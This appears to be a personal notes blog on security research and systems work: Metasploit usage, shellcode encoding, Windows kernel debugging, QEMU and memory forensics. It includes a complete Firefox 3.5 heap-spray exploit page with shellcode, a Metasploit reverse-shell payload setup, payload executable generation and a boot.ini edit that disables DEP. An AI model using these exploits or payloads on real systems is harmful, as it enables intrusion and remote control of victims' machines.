Open an website fro command prompt

"c:\program files\internet exploder\iexplore.exe 'http://www.yahoo.com'"


"c:\program files\internet exploder\iexplore.exe ''C:\hello.html"

metasploit usage

1. download  and intal it
2. open the metasploit console
windows: go to programs
linux: type msf<tab>, it will show your the commands

3. go to metasploit website, search a vulnerability, download the specific version of the application.

4. it will like:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit



5. for example, you can set the payload as /windows/exec
msf> use exploit/....
msf> set payload windows/exec
msf> set cmd calc.exe

6. for this case, if your shell code executed, the calculator will show up on you screen.

Convert binary Shell code to Javascript percentage encoding

<html>
<head>
<script language="JavaScript" type="text/javascript">
function ConvertShellCode(strdata)
{
    var s = new String(strdata);
    s = s.replace(/[\s\\x]/g, '');
    var strcode = '';

    for(var idx=0; idx<s.length; idx+=4)
        strcode += "%u" + s.substr(idx+2,2) + s.substr(idx+0,2);

    document.forms.ShellToJavascript.decode.value = strcode;
}
</script>
</head>
<body>
<form name="ShellToJavascript" method="post">
<textarea rows="10" cols="100" name="encode"></textarea><br />
<textarea rows="10" cols="100" name="decode"></textarea><br />
<input type="button" value="Encode" onclick="return ConvertShellCode(document.ShellToJavascript.encode.value)" />
</form>
</body>
</html>

http://www.governmentsecurity.org/forum/topic/27916-shell-code-convertorencoder/

How to write Shell Code; Reverse Shell code

http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html

use Metasploit to generate shell code

This post explains to use metasploit to generate binary shell code:

http://www.backtrack-linux.org/forums/showthread.php?t=35480

msf > use windows/exec
msf payload(exec) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

msf payload(exec) > set cmd taskkill /PID 12345
cmd => taskkill /PID 12345
msf payload(exec) > show options

Module options:

   Name      Current Setting      Required  Description
   ----      ---------------      --------  -----------
   CMD       taskkill /PID 12345  yes       The command string to execute
   EXITFUNC  process              yes       Exit technique: seh, thread, process, none

msf payload(exec) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(exec) > generate -t exe -f /root/windows-exec-payload.exe
[*] Writing 73802 bytes to /root/windows-exec-payload.exe...
msf payload(exec) > generate -f /root/windows-exec-payload.shellcode
[*] Writing 1013 bytes to /root/windows-exec-payload.shellcode...

User program write to IO ports on Windows

http://retired.beyondlogic.org/porttalk/porttalk.htm

Download the PortTalk 2.2 folder.
Look at the README file, you will know how to use it.

C:\porttalk>allowio beep /a
allow program beep.exe to write all the ports

C:\porttalk\AllowIO>allowio 0x42 0x43 0x61 beep.exe
allow the beep.exe to access port 0x42 0x43 and 0x61


Look at the IoExample folder, you will know how to write the sample user program to write ports.

In addition, we could use assembly IO instruction to write to port.
out dx, al
compile the assembly code into WritePort.exe file, and use AllowIo.exe to set the bitmap permission for this executable program
AllowIo.exe WritePort.exe /a

Again, AllowIo.exe provides the facility to modify the IO permission bitmap and write/read to IO ports via IOCTL calls.

Website to download old version of applications

http://www.oldapps.com/

Build Firefox Source code

Download Source Code:
https://developer.mozilla.org/En/Developer_Guide/Source_Code/Downloading_Source_Archives

Compile & Build:
https://developer.mozilla.org/En/Simple_Firefox_build
https://developer.mozilla.org/en/Build_Documentation

Crash CentOS...

I crashed my CentOS testing machine today. The command I run:

 $ yum remove glib2

I was trying to reinstall glib2(I know there is a reinstall command, but I don't why I didn't use that one), and I removed the glib2 packet. 

After I run this command, I went out for dinner. 

When I came back, my System is crashed. I tried many ways to rescue, but none of them helped. 

For exmaple: 

reboot into another kernel.

Put the CentOS installation disk, upgrade the OS, rescue the OS.....

Finally, I reinstall the CentOS. On lucky thing is I have backed up all my data on the server. 

Never never remove glib2 packet in future...

CentOS 5.5 Download

http://mirror.teklinks.com/centos/5.5/isos/i386/
http://centos.org/modules/tinycontent/index.php?id=15

Go to CentOS website, and to download mirror list.
Some Mirror doesn't have full list of versions of CentOS. You need check one by one

Memory tool on Windows

vmmap
http://technet.microsoft.com/en-us/sysinternals/dd535533
cheatengine
http://www.cheatengine.org/

Run Python on Windows

1. Download the python
http://python.org/download/

2. Install it. it ususally installed at C:\Python27

3. Run it need to add the C:\Python27 to the PATH environment variable.
http://docs.python.org/faq/windows.html#how-do-i-run-a-python-program-under-windows
Add

;C:\Python23

to the PAHT environment variable at
properties window of “My Computer” under the “Advanced” tab

4. Type python from the command line

VMware fusion snapshot

VMware Fusion snapshot saves the whole memory image file when you take a snapshot. You can find the memory image in the VM folder.

Here are some more detailed info about VMware snapshot
http://www.vmware.com/support/ws4/doc/preserve_snapshot_ws.html

OS161 Homework

Very good post on OS161 homework implementation:
http://jhshi.wordpress.com/category/os161/

Or you can find out some sample code by search: "OS161 googleproject"

Reverse Java Script Shell Code

http://pmelson.blogspot.com/2009/11/reversing-javascript-shellcode-step-by.html

It is a detailed post, but one thing I am not understand is the spider monkey part.

After using spider monkey to translate the original percentage encoding data, the result is totally different from the original data.

However, one commet of this post points out we only need to remove the "%u" and the reverse the order of original data.

Not sure which way is correct.

But it is very good post for reverse JS shell code.

BTW, I install the spider monkey on the CentOS without any problem.

Heap Spray Attack

http://1337day.com/exploits/9493

Vulnerability + NOP sleds + Shell Code

e.g., This is an exploitation HTML file targeting on Firefox 3.5.
It use heap spray attack to launch a calc.exe on Windows platforms
Same vulnerability exists on the same version firefox on Linux environment, but the shellcode needs to modified.


<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                          
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>

/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                       "%u652E%u6578%u9000");


/* Heap Spray Code */          
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001)
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()

function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}

function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}

function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }  
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

NOP sleds in Heap Spray

The NOP sleds in Heap Spray is more general. It doesn't necessary to be 0x90. It could be anything which doesn't hurt the register values or affect the shell code to run
For example
0c0c instruction: it means OR AL, 0c
Basically, the first 0c0c instruction will change the low value in EAX register, as long as it doesn't crash the program after popa instruction in shell code, it could be used as heap spray.

http://www.ask-a-pentester.com/index.php/9/about-nop-slides-in-js-heap-overflows

Hacking website

Milworm: http://1337day.com/

http://www.exploit-db.com/

http://www.metasploit.com/

http://contagiodump.blogspot.com/

http://www.offensivecomputing.net/

Windows Kernel Debugging

How to set up the Windows Kernel Debugging, please see article:
http://www.blogger.com/blogger.g?blogID=6275589693478001671#editor/target=post;postID=4149230560487743600

Some useful commands:
> dt _eprocess // see the structure of eprocess
> dt _peb // process environment block
> dt _kprocess // kernel process structure
> dt _heap // heap structure
> dt _ heap_segment
> dt  _heap_entry

Application debugging(e.g. firefox)
> !process 0 0 // list all the running process
> .context <dirbase_address> // this is to enable the context, and you can find the dirbase address from !process 0 0 command in firefox process info. Sometimes, you need to run command before enable the context
>.enable forcedecoderuser

> dt _peb <peb_address_of_Firefox>

> dd <address> // you can see the content of that location, like the x command in QEMU

> dd /p <address> // see the physical address content

> dt _heap <heap_address>

> dt _heap_entry <heap_entry_address>

Disable PAE on Windows XP SP3

Go to computer -> properties, it will show in the hardware specification if the PAE enabled.
Enabling PAE (by setting bit 5, PAE, of the system register CR4), which is the sixth bit from the left. 

Disable method:

Normal boot.ini with PAE & DEP

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Micro soft Windows XP Pro x86" /noexecute=optin /fastdetect

Disabled DEP & PAE

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Micro soft Windows XP Pro x86" /execute /fastdetect

__________________

wget in Mac

echo 'alias wget="curl -O"' >> ~/.bash_profile


curl -0 url > filename
-0 means http
save the file to filename
more see man curl

Windows Kernel Debugging by using serial port

1. Setup two machines: target machine and debugging machie

2. Download windbg at the debugging machine
http://msdn.microsoft.com/en-us/windows/hardware/gg463009
for window XP you need to download the Windows 7 version

3. Change the boot.ini file in taget machine to recognize com1 serial port.

4. Boot target machine into debugging mode ( press F8 when booting)

5. Start windbg at the debugging machine, and choose the correct device.
e.g. Serial port to USB

6. Set the the correct symbol table path.
e.g. srv*c\symbols*http://msdl.microsoft.com/download/symbols

7. run dt _eprocess

How to change boot.ini
http://www.etdot.com/2008/04/16/windbg-and-vmware/
http://support.microsoft.com/kb/289022

You also can get more information from: Windows Internals book 5 Edition

Another book： Advanced Windows Debugging

QEMU usage menu page

http://wiki.qemu.org/download/qemu-doc.html

common commands:
stop: stop the virtual machine
c/count: resume the machine

x /20w location: see the content at location
x /20c location: see the content by character
x /fmt location: fmt could be count, format, size

xp /20w location: see the content at physical memory location

How to find PsActiveProcessHead in memory on Windows

PsActiveProcessHead is a pointer to the start of the kerne's list of _EPROCESS structures.

1. Get the FS register value: 0xffdff000, which points to the Kernel Processor Control Region (KPCR) structure

2. KDVersionBlock is at the offset 0x34 of KPCR

3. Get the KdVersionBlock value: 0x8054c738 (run x /20w 0xffdff034 in QEMU monitor)

4. PsActiveProcessHead is at the offset 0x78 of KdVersionBlock, which is at location 0x8054c7b0

5. Get the PsActiveProcessHead value: 0x80560bd8 ( run x /20w 0x8054c7b0)

6. See the LIST_ENTRY field of PsActiveProcessHead, and it is a double linked list.
7. See the process name ( run x /20c location)

More Info:

http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf

Find useful memory in windows

http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf

http://forum.sysinternals.com/devphysicalmemoryfinding-my-peb_topic3473.html

http://moyix.blogspot.com/2008/04/finding-kernel-global-variables-in.html

http://download.sysinternals.com/Files/WindowsInternals-Ch05.pdf

http://www.facultyresourcecenter.com/curriculum/ResourceKits/Default.aspx?c1=en-us&c2=0